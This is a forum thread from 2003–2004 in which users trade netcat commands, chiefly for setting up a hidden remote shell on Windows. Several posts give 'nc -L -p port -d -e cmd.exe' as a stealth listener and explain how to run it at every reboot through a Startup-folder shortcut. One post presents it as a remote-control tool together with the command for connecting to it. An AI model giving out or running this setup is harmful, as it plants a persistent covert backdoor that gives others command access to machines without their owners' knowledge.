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Netcat Commands I need a listing for netcat commands

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Posted 21 December 2003 - 09:00 AM

yes u can there is a tool in the downloads section, however u cant access this yet unless someone makes it public
but why not try other startup methods like in this thread
http://www.governmen...?showtopic=5085
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Posted 21 December 2003 - 09:17 AM

very thx nulladd !!!!
now i go to read the 3d :)
thx bye ;)
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Posted 21 December 2003 - 09:22 AM

I have read the 3d, but I do not understand like making to make to leave beyond to the exe to giving the necessary attributes to the nc.

For example I would want to make to leave to every reboot
nc.exe - L - p 3388 - d -e cmd.exe

but with those methods is impossible! :(

sorry 4 my english bye ;)
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Posted 21 December 2003 - 09:55 AM

simple solution
create a shortcut in ur startup folder with the path
c:\windows\system32\nc.exe -L -p port -d -e cmd.exe

this path may vary depending on ur config
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Posted 21 December 2003 - 11:58 AM

yes, but if i work in a shell, as I create an shortcut in:

C:\Documents and Settings\USER\Start Menu\Programs\Startup


that in the path contain :

c:\windows\system32\nc.exe -L -p port -d -e cmd.exe

???

thx for the your availability

bye ;)
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Posted 06 January 2004 - 03:27 PM

http://savage.net.au...ws/html/nc.html

this is the netcat bible i always refer too. explains every switch very well.
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Post icon  Posted 11 January 2004 - 08:43 PM

the manual you guys wrote seems similar to the manual i got when extracting netcat.
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Posted 23 January 2004 - 11:27 PM

i was wondering if it was possible to use netcat to do a series of steps.

first; listen on a local TCP port and wait for a connection

second; when the connection is made, forward it to a different port.

not so hard so far, but I want this other port to be UDP, not TCP. Is there anyway to make this work.

Let me clarify more. Say set up netcat to listen on TCP port 81. Then have it tunnel all incoming connections to UDP port 445. This would be very helpful. Thanks ahead of time.
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Post icon  Posted 28 January 2004 - 12:28 AM

this is some addition to the cautios one out there. i believe that the port can be change instead of 8080. i had not try because this tools take a long time in my pc.

here it goes (can grab command shell ):

cmd line remote control tools

nc in stealth mode : -d = stealth, -e = prog to launch

1. nc -L -d -e cmd.exe -p 8080

2. nc xxx.xxx.xxx.xx 8080
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Posted 28 January 2004 - 06:51 AM

Thanks for the good information, I never knew that netcat could listen on an open port, that works good for me =D.
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